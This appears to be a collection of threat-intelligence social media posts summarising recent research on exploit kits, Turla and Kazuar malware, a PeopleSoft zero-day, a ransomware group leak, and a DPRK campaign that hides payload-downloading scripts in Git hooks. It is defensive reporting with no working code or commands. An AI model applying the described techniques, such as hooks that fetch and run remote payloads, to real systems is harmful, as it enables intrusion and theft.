Coruna iOS Exploit kit is one of those stories where the more you dig the weirder it gets. I love it..
Started as surveillance vendor tooling, ended up in mass Chinese crypto scams, and this week someone registered Iran war-themed dropper domains.
Full timeline thread. 🧵
STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus
Google Threat Intelligence Group
GTIG has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla
https://t.co/ZAnLVXF05T
@googlecloud
New from our our team at GTIG: #UNC6240 is back to targeting educational institutions in a new data theft extortion campaign. The activity targets Oracle's #PeopleSoft by exploiting Zero-Day CVE-2026-35273. Disable EMHub and check our blog for guidance.
https://t.co/5qhbKM7i6P
Excellent vid on running down mystery GPS/GNSS signals over Europe. The collection and pivoting tradecraft here is brilliant. I don't think any of us in the cyber domain will be surprised by the results, but an exciting process nonetheless.
https://t.co/k83hPxPngM
New Signals & Stories episode with @TomHegel from @SentinelOne and @invisig0th from The Vertex Project.
We discuss:
🔹DPRK IT workers posing as job applicants
🔹Cross-functional intelligence sharing
🔹AI in CTI
🔹And more!
Really fun conversation on where CTI is headed.
#CyberSecurity #CTI #ThreatIntelligence
https://t.co/VznXxSYEJX
This is a very important story on a recent evolution in tradecraft in Russian active measures, by @Martinlaineolen and team. I have also seen the full original leak, a few additional observations later today https://t.co/awiqQRp6fN
DPRK’s Contagious Interview campaign has a new trick, Git hooks.
Alongside the VSCode tasks.json abuse we've documented in the past, threat actors are hiding malicious scripts in .git/hooks/post-checkout and .githooks/pre-commit, shell scripts that run automatically on checkout or commit.
The hook fingerprints the OS via uname -s, then curls or wgets a per-platform payload from a Vercel domain straight into a shell.
Another quality technical blog from #MIRAGE, this time on Secret Blizzard’s beloved #Kazuar malware. This blog is an in-depth analysis of Kazuar’s progression from a single, monolithic framework into a modular bot ecosystem composed of three distinct module types, each with clearly defined roles. Together, these components distribute functionality across the P2P botnet, enabling flexible configuration, lower observability, and broad tasking while minimizing opportunities for detection.
https://t.co/0VzspKN1Wa
A leak has provided an unprecedented glimpse into the internal operations of the ransomware-as-a-service group known as "The Gentlemen". The group operated with a relatively small core team and recruited technical affiliates. Operators communicated via Tox protocol in addition to the https://t.co/ODFDj27TXD. The primary initial access vector across all confirmed intrusions was CVE-2024-55591, a pre-authentication bypass in FortiOS/FortiProxy affecting HTTPS management interface and SSL-VPN. In some rare cases, the group obtained valid Okta credentials from commercial infostealer log markets, bypassing VPN/perimeter controls entirely. VERY cool report:
In my estimation, defenders (of organizations) have roughly 1 year before attackers have 10-100x'd their capabilities at vulnerability discovery and exploitation.
While top-tier projects such as Linux, Chrome, Firefox can remediate this volume of vulnerabilities, not all can.
A newly decoded piece of sabotage malware called Fast16, created before Stuxnet, was made to silently tamper with calculations in research and engineering software. Likely created by the US or an ally, and possibly used against Iran's nuclear program. https://t.co/jE045ejq6u
Fresh research from the team (@vkamluk / @juanandres_gs) - this one goes back quite awhile!
fast16 | Mystery ShadowBrokers Reference Reveals High-Precision Software Sabotage 5 Years Before Stuxnet
https://t.co/cR83vHEzWo
Glad to see ORB Networks getting the attention they deserve
Using @TeamCymru’s NetFlow, you can gather statistics about the number of ORBs currently deployed around the world on a daily basis 🌍👇
1. https://t.co/0Km3BAJEDN
2. https://t.co/ztPxyMmJN2
3. https://t.co/wfq2SkEspB
New book coming next year. Working title, THE GRAYSCALE: True Stories of Hackers, Outlaws and Rogues From the Digital Underground.
Thanks to @WIRED, @mitpress and my agent @EricLupfer for making this one possible!
This comment from @tanuki42_ is really whats catching my eye here:
"... recruited facilitators to go and meet specific people who worked for the company irl at major crypto conferences, built relationships over 6 months then dropped malware on them"
Multiple in person meet ups